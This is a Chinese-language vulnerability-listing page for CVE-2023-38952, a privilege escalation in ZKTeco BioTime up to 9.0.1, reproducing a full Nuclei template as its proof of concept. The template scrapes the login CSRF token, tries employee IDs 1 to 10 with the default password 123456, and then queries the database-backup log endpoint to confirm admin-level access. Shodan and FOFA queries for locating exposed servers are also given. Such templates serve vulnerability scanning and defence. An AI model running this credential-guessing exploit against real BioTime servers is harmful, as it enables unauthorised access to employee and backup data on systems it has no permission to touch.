CVE-2023-38952: ZKTeco BioTime <= 9.0.1 - Privilege Escalation

日期: 2026-01-08 | 影响软件: ZKTeco BioTime | POC: 已公开

漏洞描述

BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.

PoC代码[已公开]

id: CVE-2023-38952

info:
  name: ZKTeco BioTime <= 9.0.1 - Privilege Escalation
  author: riteshs4hu
  severity: high
  description: |
    BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
  impact: |
    Unauthenticated attackers can access sensitive files and credentials, leading to data breach and potential system compromise.
  remediation: |
    Implement proper authentication and access controls for static file resources, and update to the latest version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38951
    - https://krashconsulting.com/fury-of-fingers-biotime-rce/
    - https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.3
    cve-id: CVE-2023-38952
    epss-score: 0.15537
    epss-percentile: 0.94449
    cwe-id: CWE-552
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:::::::*
  metadata:
    verified: true
    vendor: zkteco
    product: biotime
    max-request: 12
    shodan-query: http.html:"ZKTeco Security"
    fofa-query: body="ZKTeco Security"
  tags: cve,cve2023,biotime,zkteco,auth-bypass,priv-esc,vkev

http:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body
        regex:
          - "name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'"

  - raw:
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrf}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password=123456&captcha=&login_user=employee

    payloads:
      user:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
    attack: clusterbomb
    stop-at-first-match: true

  - raw:
      - |
        GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "db_type\":", "backup_file\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022100ba103e9c27b0c0d56138a296c3602dd0ce9894a4298d5f46155844577288e2ae0220700e732d45955c37acb128289f110cf7077ee7e82e2a8bd86806b24dc9f6c2dd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-38952.yaml

相关漏洞推荐